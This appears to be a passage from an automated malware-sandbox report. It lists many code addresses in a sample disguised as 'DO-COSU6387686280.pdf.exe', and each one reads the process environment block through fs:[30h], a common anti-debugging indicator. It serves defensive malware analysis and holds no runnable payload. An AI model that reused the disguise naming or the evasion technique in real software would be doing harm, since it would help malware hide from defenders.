                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A02E1 mov eax, dword ptr fs:[00000030h]3_2_017A02E1
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A2C3 mov eax, dword ptr fs:[00000030h]3_2_0179A2C3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A2C3 mov eax, dword ptr fs:[00000030h]3_2_0179A2C3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A2C3 mov eax, dword ptr fs:[00000030h]3_2_0179A2C3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A2C3 mov eax, dword ptr fs:[00000030h]3_2_0179A2C3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A2C3 mov eax, dword ptr fs:[00000030h]3_2_0179A2C3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01818243 mov eax, dword ptr fs:[00000030h]3_2_01818243
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01818243 mov ecx, dword ptr fs:[00000030h]3_2_01818243
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0184A250 mov eax, dword ptr fs:[00000030h]3_2_0184A250
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0184A250 mov eax, dword ptr fs:[00000030h]3_2_0184A250
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A02A0 mov eax, dword ptr fs:[00000030h]3_2_017A02A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A02A0 mov eax, dword ptr fs:[00000030h]3_2_017A02A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0186625D mov eax, dword ptr fs:[00000030h]3_2_0186625D
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840274 mov eax, dword ptr fs:[00000030h]3_2_01840274
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840274 mov eax, dword ptr fs:[00000030h]3_2_01840274
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840274 mov eax, dword ptr fs:[00000030h]3_2_01840274
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840274 mov eax, dword ptr fs:[00000030h]3_2_01840274
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840274 mov eax, dword ptr fs:[00000030h]3_2_01840274
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840274 mov eax, dword ptr fs:[00000030h]3_2_01840274
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840274 mov eax, dword ptr fs:[00000030h]3_2_01840274
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840274 mov eax, dword ptr fs:[00000030h]3_2_01840274
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840274 mov eax, dword ptr fs:[00000030h]3_2_01840274
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840274 mov eax, dword ptr fs:[00000030h]3_2_01840274
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840274 mov eax, dword ptr fs:[00000030h]3_2_01840274
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840274 mov eax, dword ptr fs:[00000030h]3_2_01840274
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CE284 mov eax, dword ptr fs:[00000030h]3_2_017CE284
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CE284 mov eax, dword ptr fs:[00000030h]3_2_017CE284
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C656A mov eax, dword ptr fs:[00000030h]3_2_017C656A
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C656A mov eax, dword ptr fs:[00000030h]3_2_017C656A
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C656A mov eax, dword ptr fs:[00000030h]3_2_017C656A
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018105A7 mov eax, dword ptr fs:[00000030h]3_2_018105A7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018105A7 mov eax, dword ptr fs:[00000030h]3_2_018105A7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018105A7 mov eax, dword ptr fs:[00000030h]3_2_018105A7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01798550 mov eax, dword ptr fs:[00000030h]3_2_01798550
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01798550 mov eax, dword ptr fs:[00000030h]3_2_01798550
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE53E mov eax, dword ptr fs:[00000030h]3_2_017BE53E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE53E mov eax, dword ptr fs:[00000030h]3_2_017BE53E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE53E mov eax, dword ptr fs:[00000030h]3_2_017BE53E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE53E mov eax, dword ptr fs:[00000030h]3_2_017BE53E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE53E mov eax, dword ptr fs:[00000030h]3_2_017BE53E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0535 mov eax, dword ptr fs:[00000030h]3_2_017A0535
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0535 mov eax, dword ptr fs:[00000030h]3_2_017A0535
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0535 mov eax, dword ptr fs:[00000030h]3_2_017A0535
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0535 mov eax, dword ptr fs:[00000030h]3_2_017A0535
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0535 mov eax, dword ptr fs:[00000030h]3_2_017A0535
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0535 mov eax, dword ptr fs:[00000030h]3_2_017A0535
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01826500 mov eax, dword ptr fs:[00000030h]3_2_01826500
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01864500 mov eax, dword ptr fs:[00000030h]3_2_01864500
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01864500 mov eax, dword ptr fs:[00000030h]3_2_01864500
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01864500 mov eax, dword ptr fs:[00000030h]3_2_01864500
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01864500 mov eax, dword ptr fs:[00000030h]3_2_01864500
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01864500 mov eax, dword ptr fs:[00000030h]3_2_01864500
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01864500 mov eax, dword ptr fs:[00000030h]3_2_01864500
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01864500 mov eax, dword ptr fs:[00000030h]3_2_01864500
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CC5ED mov eax, dword ptr fs:[00000030h]3_2_017CC5ED
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CC5ED mov eax, dword ptr fs:[00000030h]3_2_017CC5ED
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017925E0 mov eax, dword ptr fs:[00000030h]3_2_017925E0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE5E7 mov eax, dword ptr fs:[00000030h]3_2_017BE5E7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE5E7 mov eax, dword ptr fs:[00000030h]3_2_017BE5E7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE5E7 mov eax, dword ptr fs:[00000030h]3_2_017BE5E7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE5E7 mov eax, dword ptr fs:[00000030h]3_2_017BE5E7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE5E7 mov eax, dword ptr fs:[00000030h]3_2_017BE5E7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE5E7 mov eax, dword ptr fs:[00000030h]3_2_017BE5E7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE5E7 mov eax, dword ptr fs:[00000030h]3_2_017BE5E7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE5E7 mov eax, dword ptr fs:[00000030h]3_2_017BE5E7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017965D0 mov eax, dword ptr fs:[00000030h]3_2_017965D0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CA5D0 mov eax, dword ptr fs:[00000030h]3_2_017CA5D0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CA5D0 mov eax, dword ptr fs:[00000030h]3_2_017CA5D0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CE5CF mov eax, dword ptr fs:[00000030h]3_2_017CE5CF
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CE5CF mov eax, dword ptr fs:[00000030h]3_2_017CE5CF
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B45B1 mov eax, dword ptr fs:[00000030h]3_2_017B45B1
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B45B1 mov eax, dword ptr fs:[00000030h]3_2_017B45B1
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CE59C mov eax, dword ptr fs:[00000030h]3_2_017CE59C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C4588 mov eax, dword ptr fs:[00000030h]3_2_017C4588
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01792582 mov eax, dword ptr fs:[00000030h]3_2_01792582
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01792582 mov ecx, dword ptr fs:[00000030h]3_2_01792582
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BA470 mov eax, dword ptr fs:[00000030h]3_2_017BA470
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BA470 mov eax, dword ptr fs:[00000030h]3_2_017BA470
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BA470 mov eax, dword ptr fs:[00000030h]3_2_017BA470
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0184A49A mov eax, dword ptr fs:[00000030h]3_2_0184A49A
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B245A mov eax, dword ptr fs:[00000030h]3_2_017B245A
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178645D mov eax, dword ptr fs:[00000030h]3_2_0178645D
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181A4B0 mov eax, dword ptr fs:[00000030h]3_2_0181A4B0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CE443 mov eax, dword ptr fs:[00000030h]3_2_017CE443
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CE443 mov eax, dword ptr fs:[00000030h]3_2_017CE443
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CE443 mov eax, dword ptr fs:[00000030h]3_2_017CE443
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CE443 mov eax, dword ptr fs:[00000030h]3_2_017CE443
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CE443 mov eax, dword ptr fs:[00000030h]3_2_017CE443
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CE443 mov eax, dword ptr fs:[00000030h]3_2_017CE443
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CE443 mov eax, dword ptr fs:[00000030h]3_2_017CE443
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CE443 mov eax, dword ptr fs:[00000030h]3_2_017CE443
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CA430 mov eax, dword ptr fs:[00000030h]3_2_017CA430
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178E420 mov eax, dword ptr fs:[00000030h]3_2_0178E420
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178E420 mov eax, dword ptr fs:[00000030h]3_2_0178E420
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178E420 mov eax, dword ptr fs:[00000030h]3_2_0178E420
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178C427 mov eax, dword ptr fs:[00000030h]3_2_0178C427
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C8402 mov eax, dword ptr fs:[00000030h]3_2_017C8402
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C8402 mov eax, dword ptr fs:[00000030h]3_2_017C8402
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C8402 mov eax, dword ptr fs:[00000030h]3_2_017C8402
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017904E5 mov ecx, dword ptr fs:[00000030h]3_2_017904E5
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01816420 mov eax, dword ptr fs:[00000030h]3_2_01816420
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01816420 mov eax, dword ptr fs:[00000030h]3_2_01816420
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01816420 mov eax, dword ptr fs:[00000030h]3_2_01816420
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01816420 mov eax, dword ptr fs:[00000030h]3_2_01816420
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01816420 mov eax, dword ptr fs:[00000030h]3_2_01816420
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01816420 mov eax, dword ptr fs:[00000030h]3_2_01816420
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01816420 mov eax, dword ptr fs:[00000030h]3_2_01816420
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C44B0 mov ecx, dword ptr fs:[00000030h]3_2_017C44B0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017964AB mov eax, dword ptr fs:[00000030h]3_2_017964AB
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0184A456 mov eax, dword ptr fs:[00000030h]3_2_0184A456
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181C460 mov ecx, dword ptr fs:[00000030h]3_2_0181C460
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01798770 mov eax, dword ptr fs:[00000030h]3_2_01798770
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0770 mov eax, dword ptr fs:[00000030h]3_2_017A0770
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0770 mov eax, dword ptr fs:[00000030h]3_2_017A0770
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0770 mov eax, dword ptr fs:[00000030h]3_2_017A0770
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0770 mov eax, dword ptr fs:[00000030h]3_2_017A0770
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0770 mov eax, dword ptr fs:[00000030h]3_2_017A0770
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0770 mov eax, dword ptr fs:[00000030h]3_2_017A0770
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0770 mov eax, dword ptr fs:[00000030h]3_2_017A0770
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0770 mov eax, dword ptr fs:[00000030h]3_2_017A0770
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0770 mov eax, dword ptr fs:[00000030h]3_2_017A0770
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0770 mov eax, dword ptr fs:[00000030h]3_2_017A0770
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0770 mov eax, dword ptr fs:[00000030h]3_2_017A0770
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0770 mov eax, dword ptr fs:[00000030h]3_2_017A0770
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183678E mov eax, dword ptr fs:[00000030h]3_2_0183678E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018447A0 mov eax, dword ptr fs:[00000030h]3_2_018447A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01790750 mov eax, dword ptr fs:[00000030h]3_2_01790750
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2750 mov eax, dword ptr fs:[00000030h]3_2_017D2750
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2750 mov eax, dword ptr fs:[00000030h]3_2_017D2750
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C674D mov esi, dword ptr fs:[00000030h]3_2_017C674D
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C674D mov eax, dword ptr fs:[00000030h]3_2_017C674D
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C674D mov eax, dword ptr fs:[00000030h]3_2_017C674D
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C273C mov eax, dword ptr fs:[00000030h]3_2_017C273C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C273C mov ecx, dword ptr fs:[00000030h]3_2_017C273C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C273C mov eax, dword ptr fs:[00000030h]3_2_017C273C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018107C3 mov eax, dword ptr fs:[00000030h]3_2_018107C3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CC720 mov eax, dword ptr fs:[00000030h]3_2_017CC720
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CC720 mov eax, dword ptr fs:[00000030h]3_2_017CC720
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181E7E1 mov eax, dword ptr fs:[00000030h]3_2_0181E7E1
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01790710 mov eax, dword ptr fs:[00000030h]3_2_01790710
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C0710 mov eax, dword ptr fs:[00000030h]3_2_017C0710
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CC700 mov eax, dword ptr fs:[00000030h]3_2_017CC700
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017947FB mov eax, dword ptr fs:[00000030h]3_2_017947FB
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017947FB mov eax, dword ptr fs:[00000030h]3_2_017947FB
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B27ED mov eax, dword ptr fs:[00000030h]3_2_017B27ED
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B27ED mov eax, dword ptr fs:[00000030h]3_2_017B27ED
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B27ED mov eax, dword ptr fs:[00000030h]3_2_017B27ED
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0180C730 mov eax, dword ptr fs:[00000030h]3_2_0180C730
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179C7C0 mov eax, dword ptr fs:[00000030h]3_2_0179C7C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01814755 mov eax, dword ptr fs:[00000030h]3_2_01814755
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017907AF mov eax, dword ptr fs:[00000030h]3_2_017907AF
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181E75D mov eax, dword ptr fs:[00000030h]3_2_0181E75D
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C2674 mov eax, dword ptr fs:[00000030h]3_2_017C2674
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CA660 mov eax, dword ptr fs:[00000030h]3_2_017CA660
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CA660 mov eax, dword ptr fs:[00000030h]3_2_017CA660
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017AC640 mov eax, dword ptr fs:[00000030h]3_2_017AC640
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179262C mov eax, dword ptr fs:[00000030h]3_2_0179262C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C6620 mov eax, dword ptr fs:[00000030h]3_2_017C6620
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C8620 mov eax, dword ptr fs:[00000030h]3_2_017C8620
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017AE627 mov eax, dword ptr fs:[00000030h]3_2_017AE627
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2619 mov eax, dword ptr fs:[00000030h]3_2_017D2619
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018106F1 mov eax, dword ptr fs:[00000030h]3_2_018106F1
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018106F1 mov eax, dword ptr fs:[00000030h]3_2_018106F1
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A260B mov eax, dword ptr fs:[00000030h]3_2_017A260B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A260B mov eax, dword ptr fs:[00000030h]3_2_017A260B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A260B mov eax, dword ptr fs:[00000030h]3_2_017A260B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A260B mov eax, dword ptr fs:[00000030h]3_2_017A260B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A260B mov eax, dword ptr fs:[00000030h]3_2_017A260B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A260B mov eax, dword ptr fs:[00000030h]3_2_017A260B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A260B mov eax, dword ptr fs:[00000030h]3_2_017A260B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0180E6F2 mov eax, dword ptr fs:[00000030h]3_2_0180E6F2
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0180E6F2 mov eax, dword ptr fs:[00000030h]3_2_0180E6F2
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0180E6F2 mov eax, dword ptr fs:[00000030h]3_2_0180E6F2
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0180E6F2 mov eax, dword ptr fs:[00000030h]3_2_0180E6F2
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0180E609 mov eax, dword ptr fs:[00000030h]3_2_0180E609
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CA6C7 mov ebx, dword ptr fs:[00000030h]3_2_017CA6C7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CA6C7 mov eax, dword ptr fs:[00000030h]3_2_017CA6C7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C66B0 mov eax, dword ptr fs:[00000030h]3_2_017C66B0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CC6A6 mov eax, dword ptr fs:[00000030h]3_2_017CC6A6
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01794690 mov eax, dword ptr fs:[00000030h]3_2_01794690
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01794690 mov eax, dword ptr fs:[00000030h]3_2_01794690
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185866E mov eax, dword ptr fs:[00000030h]3_2_0185866E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185866E mov eax, dword ptr fs:[00000030h]3_2_0185866E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D096E mov eax, dword ptr fs:[00000030h]3_2_017D096E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D096E mov edx, dword ptr fs:[00000030h]3_2_017D096E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D096E mov eax, dword ptr fs:[00000030h]3_2_017D096E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B6962 mov eax, dword ptr fs:[00000030h]3_2_017B6962
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B6962 mov eax, dword ptr fs:[00000030h]3_2_017B6962
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B6962 mov eax, dword ptr fs:[00000030h]3_2_017B6962
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018189B3 mov esi, dword ptr fs:[00000030h]3_2_018189B3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018189B3 mov eax, dword ptr fs:[00000030h]3_2_018189B3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018189B3 mov eax, dword ptr fs:[00000030h]3_2_018189B3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018269C0 mov eax, dword ptr fs:[00000030h]3_2_018269C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185A9D3 mov eax, dword ptr fs:[00000030h]3_2_0185A9D3
